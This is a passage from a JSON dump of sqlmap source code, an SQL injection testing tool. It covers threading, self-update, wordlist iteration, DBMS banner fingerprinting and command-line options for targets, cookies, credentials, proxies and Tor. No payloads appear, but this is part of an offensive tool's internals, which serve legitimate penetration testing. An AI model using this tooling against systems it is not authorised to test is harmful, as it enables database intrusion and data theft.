dataToStdout(\"\\r\")\n                    errMsg = \"smoke test failed at importing module '%s' (%s):\\n%s\" % (path, os.path.join(root, filename), ex)\n                    logger.error(errMsg)\n                else:\n                    logger.setLevel(logging.CRITICAL)\n                    kb.smokeMode = True\n\n                    (failure_count, _) = doctest.testmod(module)\n\n                    kb.smokeMode = False\n                    logger.setLevel(logging.INFO)\n\n                    if failure_count > 0:\n                        retVal = False\n\n                count += 1\n                status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))\n                dataToStdout(\"\\r[%s] [INFO] complete: %s\" % (time.strftime(\"%X\"), status))\n\n    def _(node):\n        for __ in dir(node):\n            if not __.startswith('_'):\n                candidate = getattr(node, __)\n                if isinstance(candidate, str):\n                    if '\\\\' in candidate:\n                        try:\n                            re.compile(candidate)\n                        except:\n                            errMsg = \"smoke test failed at compiling '%s'\" % candidate\n                            logger.error(errMsg)\n                            raise\n                else:\n                    _(candidate)\n\n    for dbms in queries:\n        try:\n            _(queries[dbms])\n        except:\n            retVal = False\n\n    clearConsoleLine()\n    if retVal:\n        logger.info(\"smoke test final result: PASSED\")\n    else:\n        logger.error(\"smoke test final result: FAILED\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/core/threads.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport difflib\nimport threading\nimport time\nimport traceback\n\nfrom lib.core.compat import WichmannHill\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.datatype import AttribDict\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapBaseException\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapSkipTargetException\nfrom lib.core.exception import SqlmapThreadException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.exception import SqlmapValueException\nfrom lib.core.settings import MAX_NUMBER_OF_THREADS\nfrom lib.core.settings import PYVERSION\n\nshared = AttribDict()\n\nclass _ThreadData(threading.local):\n    \"\"\"\n    Represents thread independent data\n    \"\"\"\n\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        \"\"\"\n        Resets thread data model\n        \"\"\"\n\n        self.disableStdOut = False\n        self.hashDBCursor = None\n        self.inTransaction = False\n        self.lastCode = None\n        self.lastComparisonPage = None\n        self.lastComparisonHeaders = None\n        self.lastComparisonCode = None\n        self.lastComparisonRatio = None\n        self.lastErrorPage = tuple()\n        self.lastHTTPError = None\n        self.lastRedirectMsg = None\n        self.lastQueryDuration = 0\n        self.lastPage = None\n        self.lastRequestMsg = None\n        self.lastRequestUID = 0\n        self.lastRedirectURL = tuple()\n        self.random = WichmannHill()\n        self.resumed = False\n        self.retriesCount = 0\n        self.seqMatcher = difflib.SequenceMatcher(None)\n        self.shared = shared\n        self.technique = None\n        self.validationRun = 0\n        self.valueStack = []\n\nThreadData = _ThreadData()\n\ndef readInput(message, default=None, checkBatch=True, boolean=False):\n    # It will be overwritten by original from lib.core.common\n    pass\n\ndef isDigit(value):\n    # It will be overwritten by original from lib.core.common\n    pass\n\ndef getCurrentThreadData():\n    \"\"\"\n    Returns current thread's local data\n    \"\"\"\n\n    return ThreadData\n\ndef getCurrentThreadName():\n    \"\"\"\n    Returns current's thread name\n    \"\"\"\n\n    return threading.current_thread().getName()\n\ndef exceptionHandledFunction(threadFunction, silent=False):\n    try:\n        threadFunction()\n    except KeyboardInterrupt:\n        kb.threadContinue = False\n        kb.threadException = True\n        raise\n    except Exception as ex:\n        from lib.core.common import getSafeExString\n\n        if not silent and kb.get(\"threadContinue\") and not kb.get(\"multipleCtrlC\") and not isinstance(ex, (SqlmapUserQuitException, SqlmapSkipTargetException)):\n            errMsg = getSafeExString(ex) if isinstance(ex, SqlmapBaseException) else \"%s: %s\" % (type(ex).__name__, getSafeExString(ex))\n            logger.error(\"thread %s: '%s'\" % (threading.currentThread().getName(), errMsg))\n\n            if conf.get(\"verbose\") > 1 and not isinstance(ex, SqlmapConnectionException):\n                traceback.print_exc()\n\ndef setDaemon(thread):\n    # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation\n    if PYVERSION >= \"2.6\":\n        thread.daemon = True\n    else:\n        thread.setDaemon(True)\n\ndef runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True):\n    threads = []\n\n    def _threadFunction():\n        try:\n            threadFunction()\n        finally:\n            if conf.hashDB:\n                conf.hashDB.close()\n\n    kb.multipleCtrlC = False\n    kb.threadContinue = True\n    kb.threadException = False\n    kb.technique = ThreadData.technique\n    kb.multiThreadMode = False\n\n    try:\n        if threadChoice and conf.threads == numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):\n            while True:\n                message = \"please enter number of threads? [Enter for %d (current)] \" % numThreads\n                choice = readInput(message, default=str(numThreads))\n                if choice:\n                    skipThreadCheck = False\n\n                    if choice.endswith('!'):\n                        choice = choice[:-1]\n                        skipThreadCheck = True\n\n                    if isDigit(choice):\n                        if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:\n                            errMsg = \"maximum number of used threads is %d avoiding potential connection issues\" % MAX_NUMBER_OF_THREADS\n                            logger.critical(errMsg)\n                        else:\n                            conf.threads = numThreads = int(choice)\n                            break\n\n            if numThreads == 1:\n                warnMsg = \"running in a single-thread mode. This could take a while\"\n                logger.warning(warnMsg)\n\n        if numThreads > 1:\n            if startThreadMsg:\n                infoMsg = \"starting %d threads\" % numThreads\n                logger.info(infoMsg)\n        else:\n            try:\n                _threadFunction()\n            except (SqlmapUserQuitException, SqlmapSkipTargetException):\n                pass\n            finally:\n                return\n\n        kb.multiThreadMode = True\n\n        # Start the threads\n        for numThread in xrange(numThreads):\n            thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[_threadFunction])\n\n            setDaemon(thread)\n\n            try:\n                thread.start()\n            except Exception as ex:\n                errMsg = \"error occurred while starting new thread ('%s')\" % ex\n                logger.critical(errMsg)\n                break\n\n            threads.append(thread)\n\n        # And wait for them to all finish\n        alive = True\n        while alive:\n            alive = False\n            for thread in threads:\n                if thread.is_alive():\n                    alive = True\n                    time.sleep(0.1)\n\n    except (KeyboardInterrupt, SqlmapUserQuitException) as ex:\n        print()\n        kb.prependFlag = False\n        kb.threadContinue = False\n        kb.threadException = True\n\n        if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1):\n            kb.multipleCtrlC = True\n            raise SqlmapUserQuitException(\"user aborted (Ctrl+C was pressed multiple times)\")\n\n        kb.lastCtrlCTime = time.time()\n\n        if numThreads > 1:\n            logger.info(\"waiting for threads to finish%s\" % (\" (Ctrl+C was pressed)\" if isinstance(ex, KeyboardInterrupt) else \"\"))\n        try:\n            while (threading.active_count() > 1):\n                pass\n\n        except KeyboardInterrupt:\n            kb.multipleCtrlC = True\n            raise SqlmapThreadException(\"user aborted (Ctrl+C was pressed multiple times)\")\n\n        if forwardException:\n            raise\n\n    except (SqlmapConnectionException, SqlmapValueException) as ex:\n        print()\n        kb.threadException = True\n        logger.error(\"thread %s: '%s'\" % (threading.currentThread().getName(), ex))\n\n        if conf.get(\"verbose\") > 1 and isinstance(ex, SqlmapValueException):\n            traceback.print_exc()\n\n    except:\n        print()\n\n        if not kb.multipleCtrlC:\n            from lib.core.common import unhandledExceptionMessage\n\n            kb.threadException = True\n            errMsg = unhandledExceptionMessage()\n            logger.error(\"thread %s: %s\" % (threading.currentThread().getName(), errMsg))\n            traceback.print_exc()\n\n    finally:\n        kb.multiThreadMode = False\n        kb.threadContinue = True\n        kb.threadException = False\n        kb.technique = None\n\n        for lock in kb.locks.values():\n            if lock.locked():\n                try:\n                    lock.release()\n                except:\n                    pass\n\n        if conf.get(\"hashDB\"):\n            conf.hashDB.flush(True)\n\n        if cleanupFunction:\n            cleanupFunction()\n"
  },
  {
    "path": "sqlmap/lib/core/unescaper.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.datatype import AttribDict\nfrom lib.core.settings import EXCLUDE_UNESCAPE\n\nclass Unescaper(AttribDict):\n    def escape(self, expression, quote=True, dbms=None):\n        if expression is None:\n            return expression\n\n        for exclude in EXCLUDE_UNESCAPE:\n            if exclude in expression:\n                return expression\n\n        identifiedDbms = Backend.getIdentifiedDbms()\n\n        if dbms is not None:\n            retVal = self[dbms](expression, quote=quote)\n        elif identifiedDbms is not None and identifiedDbms in self:\n            retVal = self[identifiedDbms](expression, quote=quote)\n        else:\n            retVal = expression\n\n        # e.g. inference comparison for '\n        retVal = retVal.replace(\"'''\", \"''''\")\n\n        return retVal\n\nunescaper = Unescaper()\n"
  },
  {
    "path": "sqlmap/lib/core/update.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport glob\nimport os\nimport re\nimport shutil\nimport subprocess\nimport time\nimport zipfile\n\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import extractRegexResult\nfrom lib.core.common import getLatestRevision\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import openFile\nfrom lib.core.common import pollProcess\nfrom lib.core.common import readInput\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.revision import getRevisionNumber\nfrom lib.core.settings import GIT_REPOSITORY\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import VERSION\nfrom lib.core.settings import TYPE\nfrom lib.core.settings import ZIPBALL_PAGE\nfrom thirdparty.six.moves import urllib as _urllib\n\ndef update():\n    if not conf.updateAll:\n        return\n\n    success = False\n\n    if TYPE == \"pip\":\n        infoMsg = \"updating sqlmap to the latest stable version from the \"\n        infoMsg += \"PyPI repository\"\n        logger.info(infoMsg)\n\n        debugMsg = \"sqlmap will try to update itself using 'pip' command\"\n        logger.debug(debugMsg)\n\n        dataToStdout(\"\\r[%s] [INFO] update in progress\" % time.strftime(\"%X\"))\n\n        output = \"\"\n        try:\n            process = subprocess.Popen(\"pip install -U sqlmap\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH)\n            pollProcess(process, True)\n            output, _ = process.communicate()\n            success = not process.returncode\n        except Exception as ex:\n            success = False\n            output = getSafeExString(ex)\n        finally:\n            output = getText(output)\n\n        if success:\n            logger.info(\"%s the latest revision '%s'\" % (\"already at\" if \"already up-to-date\" in output else \"updated to\", extractRegexResult(r\"\\binstalled sqlmap-(?P<result>\\d+\\.\\d+\\.\\d+)\", output) or extractRegexResult(r\"\\((?P<result>\\d+\\.\\d+\\.\\d+)\\)\", output)))\n        else:\n            logger.error(\"update could not be completed ('%s')\" % re.sub(r\"[^a-z0-9:/\\\\]+\", \" \", output).strip())\n\n    elif not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, \".git\")):\n        warnMsg = \"not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository \"\n        warnMsg += \"from GitHub (e.g. 'git clone --depth 1 %s sqlmap')\" % GIT_REPOSITORY\n        logger.warning(warnMsg)\n\n        if VERSION == getLatestRevision():\n            logger.info(\"already at the latest revision '%s'\" % getRevisionNumber())\n            return\n\n        message = \"do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]\"\n        if readInput(message, default='N', boolean=True):\n            directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)\n\n            try:\n                open(os.path.join(directory, \"sqlmap.py\"), \"w+b\")\n            except Exception as ex:\n                errMsg = \"unable to update content of directory '%s' ('%s')\" % (directory, getSafeExString(ex))\n                logger.error(errMsg)\n            else:\n                attrs = os.stat(os.path.join(directory, \"sqlmap.py\")).st_mode\n                for wildcard in ('*', \".*\"):\n                    for _ in glob.glob(os.path.join(directory, wildcard)):\n                        try:\n                            if os.path.isdir(_):\n                                shutil.rmtree(_)\n                            else:\n                                os.remove(_)\n                        except:\n                            pass\n\n                if glob.glob(os.path.join(directory, '*')):\n                    errMsg = \"unable to clear the content of directory '%s'\" % directory\n                    logger.error(errMsg)\n                else:\n                    try:\n                        archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0]\n\n                        with zipfile.ZipFile(archive) as f:\n                            for info in f.infolist():\n                                info.filename = re.sub(r\"\\Asqlmap[^/]+\", \"\", info.filename)\n                                if info.filename:\n                                    f.extract(info, directory)\n\n                        filepath = os.path.join(paths.SQLMAP_ROOT_PATH, \"lib\", \"core\", \"settings.py\")\n                        if os.path.isfile(filepath):\n                            with openFile(filepath, \"rb\") as f:\n                                version = re.search(r\"(?m)^VERSION\\s*=\\s*['\\\"]([^'\\\"]+)\", f.read()).group(1)\n                                logger.info(\"updated to the latest version '%s#dev'\" % version)\n                                success = True\n                    except Exception as ex:\n                        logger.error(\"update could not be completed ('%s')\" % getSafeExString(ex))\n                    else:\n                        if not success:\n                            logger.error(\"update could not be completed\")\n                        else:\n                            try:\n                                os.chmod(os.path.join(directory, \"sqlmap.py\"), attrs)\n                            except OSError:\n                                logger.warning(\"could not set the file attributes of '%s'\" % os.path.join(directory, \"sqlmap.py\"))\n\n    else:\n        infoMsg = \"updating sqlmap to the latest development revision from the \"\n        infoMsg += \"GitHub repository\"\n        logger.info(infoMsg)\n\n        debugMsg = \"sqlmap will try to update itself using 'git' command\"\n        logger.debug(debugMsg)\n\n        dataToStdout(\"\\r[%s] [INFO] update in progress\" % time.strftime(\"%X\"))\n\n        output = \"\"\n        try:\n            process = subprocess.Popen(\"git checkout . && git pull %s HEAD\" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH)\n            pollProcess(process, True)\n            output, _ = process.communicate()\n            success = not process.returncode\n        except Exception as ex:\n            success = False\n            output = getSafeExString(ex)\n        finally:\n            output = getText(output)\n\n        if success:\n            logger.info(\"%s the latest revision '%s'\" % (\"already at\" if \"Already\" in output else \"updated to\", getRevisionNumber()))\n        else:\n            if \"Not a git repository\" in output:\n                errMsg = \"not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository \"\n                errMsg += \"from GitHub (e.g. 'git clone --depth 1 %s sqlmap')\" % GIT_REPOSITORY\n                logger.error(errMsg)\n            else:\n                logger.error(\"update could not be completed ('%s')\" % re.sub(r\"\\W+\", \" \", output).strip())\n\n    if not success:\n        if IS_WIN:\n            infoMsg = \"for Windows platform it's recommended \"\n            infoMsg += \"to use a GitHub for Windows client for updating \"\n            infoMsg += \"purposes (https://desktop.github.com/) or just \"\n            infoMsg += \"download the latest snapshot from \"\n            infoMsg += \"https://github.com/sqlmapproject/sqlmap/downloads\"\n        else:\n            infoMsg = \"for Linux platform it's recommended \"\n            infoMsg += \"to install a standard 'git' package (e.g.: 'apt install git')\"\n\n        logger.info(infoMsg)\n"
  },
  {
    "path": "sqlmap/lib/core/wordlist.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport zipfile\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isZipFile\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapInstallationException\nfrom thirdparty import six\n\nclass Wordlist(six.Iterator):\n    \"\"\"\n    Iterator for looping over a large dictionaries\n\n    >>> from lib.core.option import paths\n    >>> isinstance(next(Wordlist(paths.SMALL_DICT)), six.binary_type)\n    True\n    >>> isinstance(next(Wordlist(paths.WORDLIST)), six.binary_type)\n    True\n    \"\"\"\n\n    def __init__(self, filenames, proc_id=None, proc_count=None, custom=None):\n        self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames\n        self.fp = None\n        self.index = 0\n        self.counter = -1\n        self.current = None\n        self.iter = None\n        self.custom = custom or []\n        self.proc_id = proc_id\n        self.proc_count = proc_count\n        self.adjust()\n\n    def __iter__(self):\n        return self\n\n    def adjust(self):\n        self.closeFP()\n        if self.index > len(self.filenames):\n            return  # Note: https://stackoverflow.com/a/30217723 (PEP 479)\n        elif self.index == len(self.filenames):\n            self.iter = iter(self.custom)\n        else:\n            self.current = self.filenames[self.index]\n            if isZipFile(self.current):\n                try:\n                    _ = zipfile.ZipFile(self.current, 'r')\n                except zipfile.error as ex:\n                    errMsg = \"something appears to be wrong with \"\n                    errMsg += \"the file '%s' ('%s'). Please make \" % (self.current, getSafeExString(ex))\n                    errMsg += \"sure that you haven't made any changes to it\"\n                    raise SqlmapInstallationException(errMsg)\n                if len(_.namelist()) == 0:\n                    errMsg = \"no file(s) inside '%s'\" % self.current\n                    raise SqlmapDataException(errMsg)\n                self.fp = _.open(_.namelist()[0])\n            else:\n                self.fp = open(self.current, \"rb\")\n            self.iter = iter(self.fp)\n\n        self.index += 1\n\n    def closeFP(self):\n        if self.fp:\n            self.fp.close()\n            self.fp = None\n\n    def __next__(self):\n        retVal = None\n        while True:\n            self.counter += 1\n            try:\n                retVal = next(self.iter).rstrip()\n            except zipfile.error as ex:\n                errMsg = \"something appears to be wrong with \"\n                errMsg += \"the file '%s' ('%s'). Please make \" % (self.current, getSafeExString(ex))\n                errMsg += \"sure that you haven't made any changes to it\"\n                raise SqlmapInstallationException(errMsg)\n            except StopIteration:\n                self.adjust()\n                retVal = next(self.iter).rstrip()\n            if not self.proc_count or self.counter % self.proc_count == self.proc_id:\n                break\n        return retVal\n\n    def rewind(self):\n        self.index = 0\n        self.adjust()\n"
  },
  {
    "path": "sqlmap/lib/parse/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/parse/banner.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom xml.sax.handler import ContentHandler\n\nfrom lib.core.common import Backend\nfrom lib.core.common import parseXmlFile\nfrom lib.core.common import sanitizeStr\nfrom lib.core.data import kb\nfrom lib.core.data import paths\nfrom lib.core.enums import DBMS\nfrom lib.parse.handler import FingerprintHandler\n\nclass MSSQLBannerHandler(ContentHandler):\n    \"\"\"\n    This class defines methods to parse and extract information from the\n    given Microsoft SQL Server banner based upon the data in XML file\n    \"\"\"\n\n    def __init__(self, banner, info):\n        ContentHandler.__init__(self)\n\n        self._banner = sanitizeStr(banner or \"\")\n        self._inVersion = False\n        self._inServicePack = False\n        self._release = None\n        self._version = \"\"\n        self._versionAlt = None\n        self._servicePack = \"\"\n        self._info = info\n\n    def _feedInfo(self, key, value):\n        value = sanitizeStr(value)\n\n        if value in (None, \"None\"):\n            return\n\n        self._info[key] = value\n\n    def startElement(self, name, attrs):\n        if name == \"signatures\":\n            self._release = sanitizeStr(attrs.get(\"release\"))\n\n        elif name == \"version\":\n            self._inVersion = True\n\n        elif name == \"servicepack\":\n            self._inServicePack = True\n\n    def characters(self, content):\n        if self._inVersion:\n            self._version += sanitizeStr(content)\n        elif self._inServicePack:\n            self._servicePack += sanitizeStr(content)\n\n    def endElement(self, name):\n        if name == \"signature\":\n            for version in (self._version, self._versionAlt):\n                if version and self._banner and re.search(r\" %s[\\.\\ ]+\" % re.escape(version), self._banner):\n                    self._feedInfo(\"dbmsRelease\", self._release)\n                    self._feedInfo(\"dbmsVersion\", self._version)\n                    self._feedInfo(\"dbmsServicePack\", self._servicePack)\n                    break\n\n            self._version = \"\"\n            self._versionAlt = None\n            self._servicePack = \"\"\n\n        elif name == \"version\":\n            self._inVersion = False\n            self._version = self._version.replace(\" \", \"\")\n\n            match = re.search(r\"\\A(?P<major>\\d+)\\.00\\.(?P<build>\\d+)\\Z\", self._version)\n            self._versionAlt = \"%s.0.%s.0\" % (match.group('major'), match.group('build')) if match else None\n\n        elif name == \"servicepack\":\n            self._inServicePack = False\n            self._servicePack = self._servicePack.replace(\" \", \"\")\n\ndef bannerParser(banner):\n    \"\"\"\n    This function calls a class to extract information from the given\n    DBMS banner based upon the data in XML file\n    \"\"\"\n\n    xmlfile = None\n\n    if Backend.isDbms(DBMS.MSSQL):\n        xmlfile = paths.MSSQL_XML\n    elif Backend.isDbms(DBMS.MYSQL):\n        xmlfile = paths.MYSQL_XML\n    elif Backend.isDbms(DBMS.ORACLE):\n        xmlfile = paths.ORACLE_XML\n    elif Backend.isDbms(DBMS.PGSQL):\n        xmlfile = paths.PGSQL_XML\n\n    if not xmlfile:\n        return\n\n    if Backend.isDbms(DBMS.MSSQL):\n        handler = MSSQLBannerHandler(banner, kb.bannerFp)\n        parseXmlFile(xmlfile, handler)\n\n        handler = FingerprintHandler(banner, kb.bannerFp)\n        parseXmlFile(paths.GENERIC_XML, handler)\n    else:\n        handler = FingerprintHandler(banner, kb.bannerFp)\n        parseXmlFile(xmlfile, handler)\n        parseXmlFile(paths.GENERIC_XML, handler)\n"
  },
  {
    "path": "sqlmap/lib/parse/cmdline.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport re\nimport shlex\nimport sys\n\ntry:\n    from optparse import OptionError as ArgumentError\n    from optparse import OptionGroup\n    from optparse import OptionParser as ArgumentParser\n    from optparse import SUPPRESS_HELP as SUPPRESS\n\n    ArgumentParser.add_argument = ArgumentParser.add_option\n\n    def _add_argument_group(self, *args, **kwargs):\n        return self.add_option_group(OptionGroup(self, *args, **kwargs))\n\n    ArgumentParser.add_argument_group = _add_argument_group\n\n    def _add_argument(self, *args, **kwargs):\n        return self.add_option(*args, **kwargs)\n\n    OptionGroup.add_argument = _add_argument\n\nexcept ImportError:\n    from argparse import ArgumentParser\n    from argparse import ArgumentError\n    from argparse import SUPPRESS\n\nfinally:\n    def get_actions(instance):\n        for attr in (\"option_list\", \"_group_actions\", \"_actions\"):\n            if hasattr(instance, attr):\n                return getattr(instance, attr)\n\n    def get_groups(parser):\n        return getattr(parser, \"option_groups\", None) or getattr(parser, \"_action_groups\")\n\n    def get_all_options(parser):\n        retVal = set()\n\n        for option in get_actions(parser):\n            if hasattr(option, \"option_strings\"):\n                retVal.update(option.option_strings)\n            else:\n                retVal.update(option._long_opts)\n                retVal.update(option._short_opts)\n\n        for group in get_groups(parser):\n            for option in get_actions(group):\n                if hasattr(option, \"option_strings\"):\n                    retVal.update(option.option_strings)\n                else:\n                    retVal.update(option._long_opts)\n                    retVal.update(option._short_opts)\n\n        return retVal\n\nfrom lib.core.common import checkOldOptions\nfrom lib.core.common import checkSystemEncoding\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import expandMnemonics\nfrom lib.core.common import getSafeExString\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import cmdLineOptions\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.defaults import defaults\nfrom lib.core.dicts import DEPRECATED_OPTIONS\nfrom lib.core.enums import AUTOCOMPLETE_TYPE\nfrom lib.core.exception import SqlmapShellQuitException\nfrom lib.core.exception import SqlmapSilentQuitException\nfrom lib.core.exception import SqlmapSyntaxException\nfrom lib.core.option import _createHomeDirectories\nfrom lib.core.settings import BASIC_HELP_ITEMS\nfrom lib.core.settings import DUMMY_URL\nfrom lib.core.settings import IGNORED_OPTIONS\nfrom lib.core.settings import INFERENCE_UNKNOWN_CHAR\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import MAX_HELP_OPTION_LENGTH\nfrom lib.core.settings import VERSION_STRING\nfrom lib.core.shell import autoCompletion\nfrom lib.core.shell import clearHistory\nfrom lib.core.shell import loadHistory\nfrom lib.core.shell import saveHistory\nfrom thirdparty.six.moves import input as _input\n\ndef cmdLineParser(argv=None):\n    \"\"\"\n    This function parses the command line parameters and arguments\n    \"\"\"\n\n    if not argv:\n        argv = sys.argv\n\n    checkSystemEncoding()\n\n    # Reference: https://stackoverflow.com/a/4012683 (Note: previously used \"...sys.getfilesystemencoding() or UNICODE_ENCODING\")\n    _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)\n\n    usage = \"%s%s [options]\" % (\"%s \" % os.path.basename(sys.executable) if not IS_WIN else \"\", \"\\\"%s\\\"\" % _ if \" \" in _ else _)\n    parser = ArgumentParser(usage=usage)\n\n    try:\n        parser.add_argument(\"--hh\", dest=\"advancedHelp\", action=\"store_true\",\n            help=\"Show advanced help message and exit\")\n\n        parser.add_argument(\"--version\", dest=\"showVersion\", action=\"store_true\",\n            help=\"Show program's version number and exit\")\n\n        parser.add_argument(\"-v\", dest=\"verbose\", type=int,\n            help=\"Verbosity level: 0-6 (default %d)\" % defaults.verbose)\n\n        # Target options\n        target = parser.add_argument_group(\"Target\", \"At least one of these options has to be provided to define the target(s)\")\n\n        target.add_argument(\"-u\", \"--url\", dest=\"url\",\n            help=\"Target URL (e.g. \\\"http://www.site.com/vuln.php?id=1\\\")\")\n\n        target.add_argument(\"-d\", dest=\"direct\",\n            help=\"Connection string for direct database connection\")\n\n        target.add_argument(\"-l\", dest=\"logFile\",\n            help=\"Parse target(s) from Burp or WebScarab proxy log file\")\n\n        target.add_argument(\"-m\", dest=\"bulkFile\",\n            help=\"Scan multiple targets given in a textual file \")\n\n        target.add_argument(\"-r\", dest=\"requestFile\",\n            help=\"Load HTTP request from a file\")\n\n        target.add_argument(\"-g\", dest=\"googleDork\",\n            help=\"Process Google dork results as target URLs\")\n\n        target.add_argument(\"-c\", dest=\"configFile\",\n            help=\"Load options from a configuration INI file\")\n\n        # Request options\n        request = parser.add_argument_group(\"Request\", \"These options can be used to specify how to connect to the target URL\")\n\n        request.add_argument(\"-A\", \"--user-agent\", dest=\"agent\",\n            help=\"HTTP User-Agent header value\")\n\n        request.add_argument(\"-H\", \"--header\", dest=\"header\",\n            help=\"Extra header (e.g. \\\"X-Forwarded-For: 127.0.0.1\\\")\")\n\n        request.add_argument(\"--method\", dest=\"method\",\n            help=\"Force usage of given HTTP method (e.g. PUT)\")\n\n        request.add_argument(\"--data\", dest=\"data\",\n            help=\"Data string to be sent through POST (e.g. \\\"id=1\\\")\")\n\n        request.add_argument(\"--param-del\", dest=\"paramDel\",\n            help=\"Character used for splitting parameter values (e.g. &)\")\n\n        request.add_argument(\"--cookie\", dest=\"cookie\",\n            help=\"HTTP Cookie header value (e.g. \\\"PHPSESSID=a8d127e..\\\")\")\n\n        request.add_argument(\"--cookie-del\", dest=\"cookieDel\",\n            help=\"Character used for splitting cookie values (e.g. ;)\")\n\n        request.add_argument(\"--live-cookies\", dest=\"liveCookies\",\n            help=\"Live cookies file used for loading up-to-date values\")\n\n        request.add_argument(\"--load-cookies\", dest=\"loadCookies\",\n            help=\"File containing cookies in Netscape/wget format\")\n\n        request.add_argument(\"--drop-set-cookie\", dest=\"dropSetCookie\", action=\"store_true\",\n            help=\"Ignore Set-Cookie header from response\")\n\n        request.add_argument(\"--mobile\", dest=\"mobile\", action=\"store_true\",\n            help=\"Imitate smartphone through HTTP User-Agent header\")\n\n        request.add_argument(\"--random-agent\", dest=\"randomAgent\", action=\"store_true\",\n            help=\"Use randomly selected HTTP User-Agent header value\")\n\n        request.add_argument(\"--host\", dest=\"host\",\n            help=\"HTTP Host header value\")\n\n        request.add_argument(\"--referer\", dest=\"referer\",\n            help=\"HTTP Referer header value\")\n\n        request.add_argument(\"--headers\", dest=\"headers\",\n            help=\"Extra headers (e.g. \\\"Accept-Language: fr\\\\nETag: 123\\\")\")\n\n        request.add_argument(\"--auth-type\", dest=\"authType\",\n            help=\"HTTP authentication type (Basic, Digest, Bearer, ...)\")\n\n        request.add_argument(\"--auth-cred\", dest=\"authCred\",\n            help=\"HTTP authentication credentials (name:password)\")\n\n        request.add_argument(\"--auth-file\", dest=\"authFile\",\n            help=\"HTTP authentication PEM cert/private key file\")\n\n        request.add_argument(\"--ignore-code\", dest=\"ignoreCode\",\n            help=\"Ignore (problematic) HTTP error code (e.g. 401)\")\n\n        request.add_argument(\"--ignore-proxy\", dest=\"ignoreProxy\", action=\"store_true\",\n            help=\"Ignore system default proxy settings\")\n\n        request.add_argument(\"--ignore-redirects\", dest=\"ignoreRedirects\", action=\"store_true\",\n            help=\"Ignore redirection attempts\")\n\n        request.add_argument(\"--ignore-timeouts\", dest=\"ignoreTimeouts\", action=\"store_true\",\n            help=\"Ignore connection timeouts\")\n\n        request.add_argument(\"--proxy\", dest=\"proxy\",\n            help=\"Use a proxy to connect to the target URL\")\n\n        request.add_argument(\"--proxy-cred\", dest=\"proxyCred\",\n            help=\"Proxy authentication credentials (name:password)\")\n\n        request.add_argument(\"--proxy-file\", dest=\"proxyFile\",\n            help=\"Load proxy list from a file\")\n\n        request.add_argument(\"--proxy-freq\", dest=\"proxyFreq\", type=int,\n            help=\"Requests between change of proxy from a given list\")\n\n        request.add_argument(\"--tor\", dest=\"tor\", action=\"store_true\",\n            help=\"Use Tor anonymity network\")\n\n        request.add_argument(\"--tor-port\", dest=\"torPort\",\n            help=\"Set Tor proxy port other than default\")\n\n        request.add_argument(\"--tor-type\", dest=\"torType\",\n            help=\"Set 